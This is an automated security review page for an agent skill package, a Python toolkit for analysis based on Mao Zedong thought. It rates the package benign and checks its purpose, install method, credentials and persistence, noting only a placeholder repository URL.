Back to skill
Skillv1.0.0
ClawScan security
maothinking · ClawHub's context-aware review of the artifact, metadata, and declared behavior.
Scanner verdict
BenignApr 9, 2026, 10:13 AM
- Verdict
- benign
- Confidence
- high
- Model
- gpt-5-mini
- Summary
- The package and its runtime instructions are coherent with its stated purpose (a Mao Zedong–thought analysis/decision toolkit); it does not request credentials, install arbitrary remote code, or perform unexpected I/O or network activity.
- Guidance
- This skill appears internally consistent and low-risk: it’s a local Python toolkit that takes CLI/interactive input and returns analysis based on that input. Before installing, confirm the package source (the code references a placeholder GitHub URL and the skill metadata has no homepage). If you do not trust the origin, run it in an isolated environment (virtualenv, container, or sandbox) rather than installing system-wide. Also remember the tool encodes ideological/heuristic recommendations — treat its output as advisory, not authoritative, for high-stakes decisions.
Review Dimensions
- Purpose & Capability
- okThe name/description match the code and SKILL.md: modules implement contradiction analysis, situation analysis, decision helper, and principle summaries. The skill does not request unrelated credentials or binaries. Minor note: README/setup point to a placeholder GitHub repo (https://github.com/your-repo/mao-thinking) and there is no published homepage, so the origin is unclear but this is a provenance issue, not a functional mismatch.
- Instruction Scope
- okSKILL.md instructs running local Python modules or importing functions from the package. The runtime instructions only reference CLI arguments, interactive input, and JSON option payloads. The code does not read unrelated system files, environment variables, or send data to external endpoints. It does parse JSON provided on the command line (json.loads) — this is expected behavior for CLI tools and not an arbitrary code execution vector.
- Install Mechanism
- okNo install spec in the registry; the repository includes a normal setup.py and recommends pip install -e . or running scripts directly. There are no download URLs, no extract steps, and no third-party packages required at runtime (requirements.txt is dev/test oriented). Install mechanism is low-risk, but verify source before pip installing from an untrusted location.
- Credentials
- okThe skill declares no required environment variables, no primary credential, and no config paths. The code does not attempt to access credentials or network services. Environment/credential requests are proportional and minimal.
- Persistence & Privilege
- okalways:false and default agent invocation settings are used. The package does not attempt to modify other skills, global agent configuration, or persist elevated privileges. It only exposes ordinary CLI/module functionality.